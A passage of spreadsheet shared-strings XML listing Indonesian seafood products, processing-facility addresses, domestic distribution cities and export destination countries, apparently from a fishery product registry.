    <t>Ikan Demersal Beku (Sebelah, Kerapu, Layur, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Otak-otak Ikan)</t>
  </si>
  <si>
    <t>Kota Medan, Kabupaten Lampung Utara, Kota Jakarta Utara, Kabupaten Bandung, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kembung, Sarden, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kabupaten Rembang, Kabupaten Pati, Kota Semarang</t>
  </si>
  <si>
    <t>Jl. Harapan Gang Cempaka RT 03, Kel. Tungkal Harapan, Kec. Tungkal Ilir, Kabupaten Tanjung Jabung Barat&lt;br&gt;Jambi</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Sebelah, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Kabupaten Tanjung Jabung Barat, Kota Jambi</t>
  </si>
  <si>
    <t>Jl. KH Abdul Jabbar Ashiry No.100, Kel. Pai, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Australia, Hong Kong, Japan, Korea, Democratic People's Republic of, Saudi Arabia, Singapore, United States</t>
  </si>
  <si>
    <t>Pergudangan Ritz Gate Blok BA-11, Jl. Muncul, Kel. Bohar, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Bawal, Kerapu, Emperor, Sebelah, Kakatua, Kakap,  Barramundi)</t>
  </si>
  <si>
    <t>Australia, Hong Kong, Malaysia, Singapore</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Marlin, Layaran, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Jl. Alor Fatubesi RT 001 RW 001, Kel. Fatubesi, Kec. Kota Lama, Kota Kupang&lt;br&gt;Nusa Tenggara Timur</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Kupang, Kota Makassar</t>
  </si>
  <si>
    <t>Australia, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Lencam, Anggoli, Kerapu, Kakap Merah, Layur)</t>
  </si>
  <si>
    <t>Jl. Rungkut Industri 8 No. 8, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Kav DPR No.181, Kel. Serua, Kec. Bojong Sari, Kota Depok&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Makerel Atlantik, Kod, Halibut, Makerel, Salem, Sarden)</t>
  </si>
  <si>
    <t>Kota Medan, Kota Pekanbaru, Kota Palembang, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kabupaten Banyumas, Kota Semarang, Kota Surabaya, Kota Pontianak, Kota Palangka Raya, Kota Banjarmasin, Kota Balikpapan, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Makerel Atlantik, Kod, Halibut, Makerel, Salem, Sarden)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Pollock)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Pollock)</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Raya IV No.16 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Canada, China, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Bawal, Anggoli, Kerapu, Layur, Kakap)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemadang, Gindara, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kawasan Industri Candi-UKM Blok 20A No.08, Jl. Gatot Subroto, Kel. Ngaliyan, Kec. Ngaliyan, Kota Semarang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Desa Bandengan RT 006 RW 002, Kec. Jepara, Kabupaten Jepara&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Udang Rebon Kering</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tenggiri, Mata Besar)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Pisang-pisang, Layur, Bawal, Kapas-kapas, Kakap, Jaket, Barramundi)</t>
  </si>
  <si>
    <t>Kawasan Industri dan Pergudangan Cikupamas Jl. Bhumimas VIIII No.7, Kel. Talaga, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kota Palembang, Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bandung, Kabupaten Rembang, Kota Surabaya</t>
  </si>
  <si>
    <t>Kompleks Pelabuhan Perikanan Samudera Bitung, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Desa Kauditan, Kec. Kauditan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kuwe, Kerapu, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>Jl. Raya Sumorame No. 39, Kel. Sumorame, Kec. Candi, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>China, Malaysia, Netherlands, Singapore, Taiwan, Province of China, United States</t>
  </si>
  <si>
    <t>Jl. Rembang Industri Raya No. 36 PIER, Kel. Rembang, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Mata Besar, Lencam, Kerapu, Layur)</t>
  </si>
  <si>
    <t>Australia, Dominican Republic, United States</t>
  </si>
  <si>
    <t>Greece, Portugal, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Gabus Laut, Lemadang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>France, Netherlands, R√©union, Thailand</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Lele, Bandeng)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Layur, Kembung, Tenggiri, Selayar)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Jenaha, Samge, Terisi)</t>
  </si>
  <si>
    <t>Jl. Palsigunung RT 003 RW 002, Kel. Mekarsari, Kec. Cimangis, Kota Depok&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Jl. Kima Raya 2 Komplek Kima Square Warehouse 2 Unit No.11,12,13, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Canada, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Jl. Wolter Mongisidi Km 5, Kel. Wangurer, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>China, Germany, Japan, Korea, Democratic People's Republic of, Spain, Taiwan, Province of China, Thailand, United Kingdom, United States</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Swanggi, Sebelah, Manyung, Kerapu, Layur, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Brunei Darussalam, Japan</t>
  </si>
  <si>
    <t>Jl. Samuel Languyu, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Baby Tuna, Selar, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Selar, Layang, Cakalang)</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Philippines, Thailand</t>
  </si>
  <si>
    <t>Korea, Democratic People's Republic of, Netherlands, United States</t>
  </si>
  <si>
    <t>Kawasan Industri Terboyo Blok F No.16A, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Gulama, Lencam, Kerapu, Layur, Kakatua, Bawal, Kaca Piring, Kuro, Kurisi)</t>
  </si>
  <si>
    <t>China, Malaysia, Philippines, Singapore, Thailand</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Lemadang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Sidat Beku</t>
  </si>
  <si>
    <t>Green Sedayu Biz Park Cakung Blok GS-06 No.38 RT 011 RW 006, Kel. Cakung Timur, Kec. Cakung, Kota Jakarta Timur&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Tunisia</t>
  </si>
  <si>
    <t>Jl. Lumba-lumba Lingkungan IV,  RT 001 RW 004, Kel. Girian Bawah, Kec. Girian, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Australia, China, Japan, Korea, Democratic People's Republic of, Singapore, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Marlin, Gindara, Cakalang, Pedang)</t>
  </si>
  <si>
    <t>Jl. Brigjen Zein Hamid Komp. Citra Baru No.39, Kel. Titi Kuning, Kec. Medan Johor, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Tulang Ikan Kering, Kulit Ikan Kering</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Kembung, Marlin, Layaran, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Jl. Inspeksi Kalimalang RT 002 RW 001, Kel. Sukadanau, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Bandung, Kabupaten Semarang, Kota Semarang, Kota Surabaya, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Jl. Raya Lontar No. 216, Kel. Lontar, Kec. Sambikerep, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kabupaten Malang, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Malang, Kota Surabaya, Kota Batu</t>
  </si>
  <si>
    <t>Jl. Polos Salok Api RT 02, Kel. Salok Api Laut, Kec. Samboja, Kabupaten Kutai Kartanegara&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>Kepiting Soka Beku</t>
  </si>
  <si>
    <t>Daging Abalone Rebus Beku</t>
  </si>
  <si>
    <t>Jl. Raya Rembang - Tuban Km 32, Desa Sumurtawang, Kec. Kragan, Kabupaten Rembang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Lemadang, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Gulama, Manyung, Kerapu, Layur, Bawal, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Jl. Tembero No.17, Kel. Tanggulangin, Kec. Kejayan, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Pekanbaru, Kota Palembang</t>
  </si>
  <si>
    <t>Angola, Congo, Ghana, Nigeria, Singapore, Thailand</t>
  </si>
  <si>
    <t>Kota Pekanbaru, Kota Jakarta Pusat, Kota Banjarmasin</t>
  </si>
  <si>
    <t>Ghana, Saudi Arabia, Thailand, United Arab Emirates</t>
  </si>
  <si>
    <t>Kota Pekanbaru, Kota Banjarmasin</t>
  </si>
  <si>
    <t>Jl. Blanak Blok A No.10, Komplek Pelabuhan PPP Tegalsari, Kel. Tegalsari, Kec. Tegal Barat, Kota Tegal&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Kerapu, Layur, Kakatua, Bawal, Kakap, Baronang, Kurisi)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Cirebon, Kabupaten Pati, Kabupaten Kendal, Kabupaten Batang, Kabupaten Tegal, Kota Semarang, Kota Pekalongan, Kota Tegal, Kota Yogyakarta, Kota Surabaya</t>
  </si>
  <si>
    <t>Australia, China, Japan, Korea, Democratic People's Republic of, Malaysia, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Bonito, Tongkol, Kembung, Marlin, Salem, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Cirebon, Kota Cirebon, Kabupaten Semarang, Kabupaten Kendal, Kabupaten Batang, Kabupaten Pekalongan, Kabupaten Tegal, Kota Semarang, Kota Pekalongan, Kota Tegal, Kabupaten Banyuwangi, Kabupaten Probolinggo, Kota Probolinggo, Kota Surabaya</t>
  </si>
  <si>
    <t>Australia, China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Cirebon, Kota Cirebon, Kabupaten Pati, Kabupaten Semarang, Kabupaten Kendal, Kabupaten Batang, Kabupaten Pekalongan, Kabupaten Pemalang, Kabupaten Tegal, Kota Semarang, Kota Pekalongan, Kota Tegal, Kabupaten Banyuwangi, Kabupaten Probolinggo, Kota Surabaya</t>
  </si>
  <si>
    <t>Daging Rajungan Kaleng</t>
  </si>
  <si>
    <t>Udang Kaleng</t>
  </si>
  <si>
    <t>Kerang Kaleng</t>
  </si>
  <si>
    <t>South Africa</t>
  </si>
  <si>
    <t>Cephalopoda Kaleng</t>
  </si>
  <si>
    <t>Spain</t>
  </si>
  <si>
    <t>Jl. Line Pipa, Dusun A, Kel. Paloh Punti, Kec. Muara Satu, Kota Lhokseumawe&lt;br&gt;Aceh</t>
  </si>
  <si>
    <t>Tridaya Nuansa Indah, Jl. Kelapa Gading Raya EA.9 No.12A, Kel. Sumber Jaya, Kec. Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Tekwan</t>
  </si>
  <si>
    <t>Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung</t>
  </si>
  <si>
    <t>Jl. Tanjung Berombang, Dusun V, Kel. Asahan Mati, Kec. Tanjungbalai, Kabupaten Asahan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Korea, Democratic People's Republic of, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Kawasan Industri Graha Permai Balaraja, Jl. Raya Serang KM 28, Kel. Tobat, Kec. Balaraja, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kerang Batik Kaleng</t>
  </si>
  <si>
    <t>Canada, South Africa, United States</t>
  </si>
  <si>
    <t>Belgium, South Africa, United States</t>
  </si>
  <si>
    <t>Belgium, Canada, Germany, Netherlands, United States</t>
  </si>
  <si>
    <t>Daging Rajungan Pasteurisasi Kaleng dan Pouch</t>
  </si>
  <si>
    <t>Jl. Raya Pakal No.71, Kel. Pakal, Kec. Pakal, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Malaysia, Singapore</t>
  </si>
  <si>
    <t>China, Italy, Japan, Thailand, United States</t>
  </si>
  <si>
    <t>China, Japan, Thailand, United States</t>
  </si>
  <si>
    <t>Jl. Veteran Madya I No.1 RT 011 RW 003, Kel. Gending, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>China, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Margomulyo 44, Komplek Pergudangan Suri Mulia Permai Blok B No.21, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Wisata Bahari Km 31 RT 006 RW 002, Kel. Kawal, Kec. Gunung Kijang, Kabupaten Bintan&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Jahan, Gabus)</t>
  </si>
  <si>
    <t>Germany, Japan, Korea, Democratic People's Republic of, United States</t>
  </si>
  <si>
    <t>Ossein</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Jahan, Gabus)</t>
  </si>
  <si>
    <t>Pelabuhan Perikanan Samudera Nizam Zachman Jakarta, Ruang Processing No.4 Dermaga Barat, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kota Bogor</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kota Bandung</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kuwe, Kerapu, Layur, Bawal, Samge, Selar, Kakap, Ekor Kuning)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bandung</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Salem, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Tukad Punggawa No.238X Lingkungan Banjar Ponjok, Kel. Serangan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Kabupaten Badung</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Mata Besar, Tongkol, Kembung, Layaran, Selar, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Mata Besar, Tongkol, Kembung, Layaran, Selar, Tenggiri)</t>
  </si>
  <si>
    <t>Dusun Nirwana RT 10 RW 04, Kel. Sungai Kakap, Kec. Sungai Kakap, Kabupaten Kubu Raya&lt;br&gt;Kalimantan Barat</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Senangin, Manyung, Kerapu, Bawal, Kakap, Kurau, Barramundi)</t>
  </si>
  <si>
    <t>Jl. Baso Dg. Bella No. 8, Kel. Kalukuang, Kec. Galesong, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Dusun Stasiun RT 01 RW 01, Kel. Sukomulyo, Kec. Pajarakan, Kabupaten Probolinggo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Fillet Bandeng Beku</t>
  </si>
  <si>
    <t>Jl. Raya Banyuwangi Km 10, Kel. Landangan, Kec. Kapongan, Kabupaten Situbondo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kabupaten Semarang, Kabupaten Malang, Kota Surabaya, Kota Denpasar, Kota Makassar</t>
  </si>
  <si>
    <t>Canada, Denmark, Japan, United States</t>
  </si>
  <si>
    <t>Pulau Abang, Kel. Pulau Abang, Kec. Galang, Kota Batam&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Bawal Hitam, Talang-Talang, Selar, Tenggiri, Dingkis)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Manyung, Kerapu, Merah, Baronang, Kaci-Kaci, Timun, Ekor Kuning)</t>
  </si>
  <si>
    <t>Cephalopoda Segar (Sotong, Cumi-Cumi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Kembung, Marlin, Layang, Cakalang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Lencam, Kerapu, Layur, Sukang, Kakatua, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Jl. Dermaga Muara Angke No. 10, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal Hitam, Lencam, Senangin, Manyung, Kerapu, Layur, Kakap Merah, Kurisi, Ekor Kuning)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Bonito, Malalugis, Cakalang, Ekor Kuning)</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Taiwan, Province of China, Thailand, United States</t>
  </si>
  <si>
    <t>Jl. Banget Ayu RT 01 RW 05, Kel. Banget Ayu Kulon, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Netherlands, United Kingdom</t>
  </si>
  <si>
    <t>Jl. Wonokoyo RT 02 RW 03, Kel. Landangan, Kec. Kapongan, Kabupaten Situbondo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kabupaten Bogor, Kota Tangerang</t>
  </si>
  <si>
    <t>Komplek Pergudangan Bandara Benda Permai Blok E No.20 Jl. Raya Perancis No.688 RT 003 RW 008, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Keong Laut Hidup</t>
  </si>
  <si>
    <t>China, Hong Kong, Malaysia, Singapore, Viet Nam</t>
  </si>
  <si>
    <t>Jorong Unggan Aro, Kel. Unggan, Kec. Sumpur Kudus, Kabupaten Sijunjung&lt;br&gt;Sumatera Barat</t>
  </si>
  <si>
    <t>Kabupaten Sijunjung</t>
  </si>
  <si>
    <t>Rengginang Ikan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Kembung, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Hong Kong, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Patimura No.09, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Albania, Australia, Canada, Cyprus, Greece, Italy, Portugal</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Tembang, Kembung, Lemadang, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Malong, Sebelah, Manyung, Kerapu, Bawal, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Daging Bekicot Beku</t>
  </si>
  <si>
    <t>Portugal</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Lele, Belut, Gurami, Bandeng, Mujair)</t>
  </si>
  <si>
    <t>Jl. Mulawarman RT 3, Desa Kerayaan, Kec. Sangkulirang, Kabupaten Kutai Timur&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>Jl. Wisata Bahari No.8 Km 31 RT 006 RW 002, Kel. Kawal, Kec. Gunung Kijang, Kabupaten Bintan&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Jahan, Haruan, Kemejan, Kakap)</t>
  </si>
  <si>
    <t>Jl. Dermaga Penyebrangan Kali Adem No.21 Room 06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Salem)</t>
  </si>
  <si>
    <t>Jl. Cendana No.55 Dusun Silva Lambaroeh, Kel. Ulee Pata, Kec. Jaya Baru, Kota Banda Aceh&lt;br&gt;Aceh</t>
  </si>
  <si>
    <t>Kota Banda Aceh</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Layaran, Selar, Tenggiri)</t>
  </si>
  <si>
    <t>Dusun Jatisari RT 001 RW 002, Kel. Bomo, Kec. Blimbingsari, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Banyuwangi, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Baby Tuna, Barakuda, Deho, Malalugis, Lemadang)</t>
  </si>
  <si>
    <t>Jl. Ringroad Dusun Pereng RT 001 RW 007, Kel. Gendong Kulon, Kec. Babat, Kabupaten Lamongan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Panni, Tongkol, Kawabida, Layang, Salem)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramudi, Kakap)</t>
  </si>
  <si>
    <t>Cephalopoda Beku (Cumi-Cum)</t>
  </si>
  <si>
    <t>Jl. Marsekal Surya Dharma Pergudangan Bandara Mas Blok A9, Kel. Selapang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Jl. Tol Lama Pergudangan Karunia Sulawesi Blok G No.11, Kel. Parangloe, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Chile, China, Denmark, Korea, Democratic People's Republic of, Philippines, Spain</t>
  </si>
  <si>
    <t>Dusun Kampungbaru RT 04 RT 03, Kel. Grajagan, Kec. Purwoharjo, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Pasir Putih Raya Kav 1, Ancol Timur RT 003 RW 010, Kel. Ancol, Kec. Pademangan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Fillet Kod Beku</t>
  </si>
  <si>
    <t>Jl. Dr. Leimena No.8A, Kel. Tawiri, Kec. Teluk Ambon, Kota Ambon&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>Ikan Demersal Hidup (Kuwe, Kerapu, Kakatua)</t>
  </si>
  <si>
    <t>Jl. Trans Manado-Bitung, Desa Kauditan II Jaga XIII, Kec. Kauditan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Deho, Malalugis, Cakalang)</t>
  </si>
  <si>
    <t>Kampung Adiwarna, Kel. Kampung Adiwarna, Kec. Gedung Meneng, Kabupaten Tulangbawang&lt;br&gt;Lampung</t>
  </si>
  <si>
    <t>Udang Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>Germany, Japan, Philippines, United Kingdom</t>
  </si>
  <si>
    <t>Ikan Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>Italy, Philippines</t>
  </si>
  <si>
    <t>Kabupaten Cilacap, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Lencam, Manyung, Kerapu, Layur, Bawal, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Tembang, Lemadang, Selar, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>China, Japan, Malaysia, Singapore, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Blok. Sirawa RT 001 RW 005, Kel. Grogol, Kec. Gunung Jati, Kabupaten Cirebon&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kabupaten Bandung, Kabupaten Cirebon, Kabupaten Indramayu, Kota Bandung, Kota Cimahi, Kabupaten Rembang, Kabupaten Pati, Kabupaten Brebes, Kota Tegal</t>
  </si>
  <si>
    <t>American Samoa, Japan, Russian Federation</t>
  </si>
  <si>
    <t>Cangkang Rajungan</t>
  </si>
  <si>
    <t>Jl. Merak No.04 RT 001 RW 023, Kel. Palangka, Kec. Jekan Raya, Kota Palangka Raya&lt;br&gt;Kalimantan Tengah</t>
  </si>
  <si>
    <t xml:space="preserve">Abon Ikan, Abon Rendang Ikan, Abon Kandas Sarai Ikan </t>
  </si>
  <si>
    <t>Kota Medan, Kota Padang, Kota Pekanbaru, Kota Bengkulu, Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Cimahi, Kabupaten Kudus, Kota Magelang, Kota Surakarta, Kota Yogyakarta, Kabupaten Jember, Kabupaten Banyuwangi, Kota Malang, Kota Surabaya, Kota Tangerang, Kota Denpasar, Kabupaten Lombok Barat, Kabupaten Lombok Tengah, Kabupaten Lombok Timur, Kabupaten Lombok Utara, Kabupaten Kapuas Hulu, Kota Pontianak, Kabupaten Kotawaringin Barat, Kabupaten Kotawaringin Timur, Kabupaten Kapuas, Kabupaten Barito Selatan, Kabupaten Barito Utara, Kabupaten Seruyan, Kabupaten Katingan, Kabupaten Pulang Pisau, Kabupaten Gunung Mas, Kabupaten Barito Timur, Kabupaten Murung Raya, Kota Palangka Raya, Kabupaten Barito Kuala, Kabupaten Hulu Sungai Selatan, Kabupaten Hulu Sungai Tengah, Kabupaten Hulu Sungai Utara, Kota 